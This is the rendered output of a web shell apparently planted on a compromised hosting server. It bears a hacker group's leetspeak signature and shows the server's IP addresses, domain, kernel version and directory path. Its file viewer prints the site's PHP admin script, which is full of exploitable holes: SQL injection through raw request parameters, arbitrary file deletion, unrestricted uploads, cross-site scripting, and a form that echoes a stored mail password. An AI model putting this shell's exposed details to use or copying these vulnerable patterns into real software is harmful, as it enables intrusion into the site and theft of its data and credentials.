1337 3YP455 5H311
:
216.73.216.113
:
119.59.104.17 / hrdigest.co.th
:
Linux re1.hostinglotus.net 4.18.0-553.58.1.el8_10.x86_64 #1 SMP Wed Jun 25 06:37:46 EDT 2025 x86_64
:
/
home
/
hrdigest
/
public_html
/
admin
/
UP104D F1L3:
files >> /home/hrdigest/public_html/admin/autoform.php
<? // *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** // require("../inc/function_admin.php"); checkid(); if($_GET["action"] == "Delete" && !empty($_GET["id"])){ mysql_query("Delete From `$_GET[tb]` Where `id` = '$_GET[id]'"); @header("Location: autoform.php?tb=$_GET[tb]&cname=$_GET[cname]"); exit; } if($_GET[action] == "remove"){ if(!empty($_GET[im])){ @unlink("../images/webpage/$_GET[im]"); } mysql_query("Update `$_GET[tb]` Set `$_GET[na]` = '' Where `id` = '$_GET[id]' ") or die ("Can't Perform Query 0"); header("Location: autoform.php?tb=$_GET[tb]&cname=$_GET[cname]&action=Edit&id=$_GET[id]"); exit; } if($_GET[action] == "remove2"){ $tb2 = $_GET[tb] . "_setting" ; if(!empty($row["logo"])) @unlink("../images/webpage/$row[logo]"); mysql_query("Update `$tb2` Set `logo` = '' Where `id` = '1' "); header("Location: autoform.php?tb=$_GET[tb]&cname=$_GET[cname]&action=setting&id=$_GET[id]"); exit; } if(!empty($_POST["action"])){ $a_in = ""; $b_in = ""; $a_up = ""; $fields = array_keys($_POST); for($i = 0; $i < count($fields); $i++){ $actual_var = $fields[$i]; $actual_val = stripslashes($_POST[$actual_var]); $actual_val = addslashes($actual_val); if($actual_var <> "Submit"){ if($actual_var <> "action"){ if($actual_var <> "id"){ if($actual_var <> "tb"){ if($actual_var <> "images"){ if($actual_var <> "default_page"){ if($actual_var <> "submit"){ $a_in .= " `$actual_var` ,"; $b_in .= " '$actual_val' ,"; $a_up .= " `$actual_var` = '$actual_val' ,"; } // End If } // End If } // End If } // End If } // End If } // End If } // End If } // End For $a_in = substr($a_in, 0, -1); $b_in = substr($b_in, 0, -1); $a_up = substr($a_up, 0, -1); $fields = array_keys($_FILES); for($i = 0; $i < count($fields); $i++){ $Picture = $fields[$i]; $$Picture = $_FILES[$Picture][tmp_name]; $$Picture_size = $_FILES[$Picture][size]; if(!empty($$Picture)){ $md5 = md5(time() . $Picture); $explode = explode(".", ereg_replace(" ", "", $_FILES[$Picture]["name"])); $$Picture_name = substr($md5, 0, 4) . substr($md5, -4, 4) . "." . strtolower($explode[count($explode) - 1]); if(!empty($images[$Picture])){ @unlink("../images/webpage/$images[$Picture]"); } @copy($$Picture , "../images/webpage/" . $$Picture_name); $a_in .= " , `$Picture`"; $b_in .= " , '" . $$Picture_name . "'"; $a_up .= " , `$Picture` = '" . $$Picture_name . "'"; } } if($_POST[action] == "Add"){ mysql_query("Insert Into `$_POST[tb]` ( $a_in ) Values ( $b_in )"); @header("Location: autoform.php?tb=$_POST[tb]&cname=$_GET[cname]"); exit; }elseif($_POST[action] == "Update"){ mysql_query("Update `$_POST[tb]` Set $a_up Where `id` = '$_POST[id]'"); //echo ("Update `$_POST[tb]` Set $a_up Where `id` = '$_POST[id]'"); //@header("Location: autoform.php?tb=$_POST[tb]&cname=$_GET[cname]&id=$_POST[id]&action=Edit"); //exit; }elseif($_POST[action]== "setting"){ $tb2 = $_POST[tb] . "_setting" ; $num = mysql_num_rows(mysql_query("Select * From `$tb2` ")); if($num == 0){ //echo "Insert Into `form_job_setting` (`id`, $a_in ) Values ( '1', $b_in )"; mysql_query("Insert Into `$tb2` (`id`, $a_in ) Values ( '1', $b_in )"); //@header("Location: addnew_menu.php?cname=$_GET[cname]&dic=$_GET[dic]"); }else{ mysql_query("Update `$tb2` Set $a_up Where `id` = '$_POST[id]'"); //@header("Location: addnew_menu.php?cname=$_GET[cname]&dic=$_GET[dic]"); } } } // End If ?> <html> <head> <? require("../inc/title.php") ?> <link href="index.css" rel="stylesheet" type="text/css"> <script language="javascript" type="text/javascript"> <!-- function Delete(id){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "autoform.php?tb=<? echo $_GET[tb] ?>&action=Delete&id=" + id + "&cname=<?=$_GET[cname]?>"; } } } function remove(id,im,na){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "autoform.php?tb=<? echo $_GET[tb] ?>&action=remove&id=" + id + "&im=" + im + "&na=" + na + "&cname=<?=$_GET[cname]?>"; } } } function remove2(id){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "autoform.php?tb=<? echo $_GET[tb] ?>&action=remove2&id=" + id ; } } } --> </script> <script language="JavaScript" type="text/javascript" src="wysiwyg.js"></script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body bgcolor="#ffffff"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><? top_page() ?></td> </tr> </table> <table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="200" valign="top" background="icon/bgbar.jpg"><? require("menu.php") ?></td> <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: <? echo $_GET["cname"] ?> ::</b></td> </tr> </table> <? $tb = $_GET[tb]; $php_board = "autoform.php?tb=$_GET[tb]&cname=$_GET[cname]&sort=$_GET[sort]"; if(empty($_GET[show])){ $show = 0; }else{ $show = $_GET[show]; } if(empty($_GET[maxshow])){ $maxshow= 15; }else{ $maxshow= $_GET[maxshow]; } if(empty($_GET["action"])){ if (!empty($_GET["sort"])) { $show_sort = " `$_GET[sort]` Asc "; }else{ $show_sort = " `id` Desc "; } $result = mysql_query("Select * From `$tb` Order By $show_sort Limit $show , $maxshow"); $num = mysql_num_rows(mysql_query("Select * From `$tb` ")); //echo ("Select * From `$tb` Order By $show_sort Limit $show , $maxshow"); $result_col = mysql_query("SHOW COLUMNS FROM `$tb` where `Field` like '%_s' "); $num_col = mysql_num_rows($result_col); //echo $num_col; ?> <table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td><? $tb2 = $_GET[tb] . "_setting" ; $rmail = @mysql_fetch_array(mysql_query("Select * From `$tb2` Where `id` = '1' ")); if (empty($rmail[subject]) || empty($rmail[fmail])) { ?> <font color="#FF0000">* ยังไม่มีการเซต E-mail ผู้ส่ง</font> <? } ?></td> <td align="right"><a href="autoform.php?tb=<?=$_GET[tb]?>&action=Add&cname=<? echo $_GET["cname"] ?>&show=<?=$_GET["show"]?>">Add New <? echo $_GET["cname"] ?></a> | <a href="autoform.php?tb=<?=$_GET[tb]?>&action=setting&cname=<? echo $_GET["cname"] ?>&show=<?=$_GET["show"]?>">E-mail Setting</a> | <a href="to_excel.php?tb=<?=$_GET[tb]?>" target="_blank">Export To Excel > </a></td> </tr> </table> <table width="100%" border="0" cellpadding="5" cellspacing="1" class="main border1"> <tr style="background:#0099cc; color:#ffffff;"> <? $i_col = 1; $i_col2 = 1; while ($row_col = mysql_fetch_row($result_col)) { $name_col[$i_col] = $row_col[0]; $i_col++; $e_col = $row_col[0]; if (strpos("$e_col","_s")){ $e_col = substr($e_col,0,-2); } ?> <td width="100" class="border4"><a href="autoform.php?tb=<?=$_GET[tb]?>&cname=<?=$_GET[cname]?>&sort=<?=$e_col?>_s"><font color="#FFFFFF"><?=$e_col?></font></a></td> <? } ?> <td width="50" class="" align="center">Option </td> </tr> <? while($row = mysql_fetch_array($result)){ ?> <tr onMouseOver="style.backgroundColor='#feedc7';" onMouseOut="style.backgroundColor='#FFFFFF';"> <? For ($i_col2=1;$i_col2 <=$num_col;$i_col2++){ $i_name = $name_col[$i_col2]; ?> <td class="border2 border4"><? echo $row[$i_name] ?> </td> <? } ?> <td class="border2" align="center"><a href="autoform.php?tb=<? echo $_GET["tb"] ?>&action=Edit&id=<? echo $row["id"] ?>&cname=<?=$_GET[cname]?>&show=<?=$_GET["show"]?>"><img src="icon/show.gif" border="0" /></a> <a href="javascript:Delete('<? echo $row["id"] ?>');"><img src="icon/del.gif" border="0" /></a></td> </tr> <? } ?> </table> <? include("nextpage.php") ?> <? }elseif($_GET["action"] == "Add"){ ?> <form method="post" enctype="multipart/form-data" > <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td><strong>Add New <? echo $_GET["cname"] ?></strong></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="3" cellspacing="1" class="main border1"> <? $result_col = mysql_query("SHOW COLUMNS FROM `$tb` "); $num_col = mysql_num_rows($result_col); while ($row_col = mysql_fetch_row($result_col)) { $e_col = $row_col[0]; if (strpos("$e_col","_s")){ $e_col = substr($e_col,0,-2); } if ($row_col[0]=="id") { echo ""; } else { ?> <tr> <td width="19%" class="border2 border4"><?=$e_col?></td> <td width="81%" class="border2"> <? if (strstr("$e_col","file")){ ?> <input name="<? echo $row_col[0] ?>" type="file" class="main" id="<? echo $row_col[0] ?>"> <? }else{ ?> <input type="text" name="<? echo $row_col[0] ?>" value="" class="main" style="width:300px;" /> <? } ?> </td> </tr> <? } } ?> <tr> <td class="border2 border4"> </td> <td class="border2"><input type="submit" value="Add New Data" class="main" style="width:200px;" /> <input type="button" value="Back" class="main" style="width:80px;" onClick="location='autoform.php?tb=<? echo $_GET["tb"] ?>&cname=<? echo $_GET["cname"] ?>';" /> <input type="hidden" name="action" value="Add" /> <input name="tb" type="hidden" id="tb" value="<?=$_GET[tb]?>" /></td> </tr> </table> </form> <? }elseif($_GET["action"] == "Edit" && $row = mysql_fetch_array(mysql_query("Select * From `$_GET[tb]` Where `id` = '$_GET[id]'"))){ $result_col = mysql_query("SHOW COLUMNS FROM `$tb` "); $num_col = mysql_num_rows($result_col); //echo $num_col; ?> <form method="post" enctype="multipart/form-data"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td><strong>Edit Data <? echo $_GET["cname"] ?></strong></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="3" cellspacing="1" class="main border1"> <? while ($row_col = mysql_fetch_row($result_col)) { $e_col = $row_col[0]; $n_col = $row_col[0]; if (strpos("$e_col","_s")){ $e_col = substr($e_col,0,-2); } ?> <tr> <td width="187" class="border2 border4"><?=$e_col?></td> <td width="790" class="border2"> <? if ($row_col[0]=="id") { ?> <? echo $row[$row_col[0]] ?> <? } else { ?> <? if (strstr("$e_col","file")){ ?> <input name="<? echo $row_col[0] ?>" type="file" class="main" id="<? echo $row_col[0] ?>"> <? if(!empty($row[$n_col])){ echo "<a href='../images/webpage/$row[$n_col]' target='_blank'><img src='icon/b_image.gif' border='0' /></a> : <img style='cursor:pointer;' src='icon/del.gif' border='0' onClick=\"remove('$row[id]' , '$row[$n_col]' , '$n_col');\" />"; } ?> <? }else{ ?> <input type="text" name="<? echo $row_col[0] ?>" value="<? echo $row[$row_col[0]] ?>" class="main" style="width:300px;" /> <? } } ?> </td> </tr> <? } ?> <tr> <td class="border2 border4"> </td> <td class="border2"><input type="submit" value=" Update " class="main" style="width:80px;" /> <input type="button" value="Back" class="main" style="width:80px;" onClick="location='autoform.php?tb=<?=$_GET[tb]?>&cname=<? echo $_GET["cname"] ?>&show=<?=$_GET["show"]?>';" /> <input type="hidden" name="action" value="Update" /> <input name="tb" type="hidden" id="tb" value="<?=$_GET[tb]?>" /> <input name="id" type="hidden" id="id" value="<?=$_GET[id]?>" /></td> </tr> </table> </form> <p> <? }elseif($_GET["action"] == "setting") { ?> </p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="80%"> </td> <td width="20%" align="center"><div style="padding:5px 10px 5px 10px;background:#CCC;color:#FFF;"><a href="autoform.php?tb=<?=$_GET[tb]?>">BACK TO CONTACT</a></div></td> </tr> </table> <? $row = mysql_fetch_array(mysql_query("Select * From `form_contact_setting` Where `id`='1' ")); ?> <form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"> <table width="100%" border="0" cellspacing="2" cellpadding="2" style="font-size: 13px; font-weight: bold;"> <tr> <td valign="top" bgcolor="#E1E1E1">Company SETTING</td> <td bgcolor="#E1E1E1"> </td> </tr> <tr> <td valign="top">Company</td> <td><input name="companyname" type="text" id="companyname" size="80" value="<?=$row[companyname]?>" /></td> </tr> <tr> <td valign="top">Address</td> <td><input name="address" type="text" id="address" size="80" value="<?=$row[address]?>" /></td> </tr> <tr> <td valign="top">Logo </td> <td><label for="logo"></label> <input type="file" name="logo" id="logo" /> <? if(!empty($row["logo"])){ echo "<a href='../images/webpage/$row[logo]' target='_blank'><img src='icon/image.gif' alt='View Image' border='0' width='16' height='16' /></a><a href=\"javascript:remove2('$row[id]')\"><img src='icon/delete.gif' alt='Remove Image' border='0' width='16' height='16' /></a>"; } ?></td> </tr> <tr> <td valign="top" bgcolor="#E1E1E1">E-mail SETTING</td> <td bgcolor="#E1E1E1"> </td> </tr> <tr> <td width="15%" valign="top">Subject</td> <td width="85%"><label for="subject"> <input name="subject" type="text" id="subject" size="80" value="<?=$row[subject]?>" /> </label></td> </tr> <tr> <td valign="top">To</td> <td>Customer</td> </tr> <tr> <td valign="top">From Name</td> <td><input name="fname" type="text" id="fname" size="80" value="<?=$row[fname]?>" /></td> </tr> <tr> <td valign="top">From Mail</td> <td><input name="fmail" type="text" id="fmail" size="80" value="<?=$row[fmail]?>"/></td> </tr> <tr> <td valign="top">Reply To</td> <td><input name="bcc" type="text" id="bcc" size="80" value="<?=$row[bcc]?>" /></td> </tr> <tr> <td valign="top">Detail</td> <td><textarea name="detail" cols="80" rows="10" id="detail"><?=$row[detail]?> </textarea> <script language="javascript1.2">generate_wysiwyg('detail');</script></td> </tr> <tr> <td valign="top">Function</td> <td><label for="mtype"> <input name="mtype" type="radio" id="radio" value="0" <? if($row[mtype]==0) { ?> checked="checked" <? } ?> /> Function mail</label> <label for="mtype"> <input type="radio" name="mtype" id="radio" value="1" <? if($row[mtype]==1) { ?> checked="checked" <? } ?> /> Function PHPmailer</label></td> </tr> <tr> <td valign="top" bgcolor="#E1E1E1">PHP mailer Setting</td> <td bgcolor="#E1E1E1"> </td> </tr> <tr> <td valign="top">Mail Server</td> <td><input name="host" type="text" id="host" size="80" value="<?=$row[host]?>" /></td> </tr> <tr> <td valign="top">E-mail</td> <td><input name="acc_email" type="text" id="acc_email" size="80" value="<?=$row[acc_email]?>" /></td> </tr> <tr> <td valign="top">Password</td> <td><input name="acc_password" type="password" id="acc_password" size="80" value="<?=$row[acc_password]?>" /></td> </tr> <tr> <td valign="top"> </td> <td> </td> </tr> <tr> <td valign="top"> </td> <td><input type="submit" name="Submit" id="Submit" value=" SAVE DATA " /> <input name="action" type="hidden" id="action" value="setting" /> <input name="id" type="hidden" id="id" value="1" /> <input name="ctime" type="hidden" id="ctime" value="<?=date("Y-m-d H:i:s") ?>" /> <span class="border2"> <input name="tb" type="hidden" id="tb" value="<?=$_GET[tb]?>" /> </span></td> </tr> </table> </form> <? } ?></td> </tr> </table></td> </tr> </table> </body> </html>
1337r0j4n | 13379H0575 53CURI7Y 734M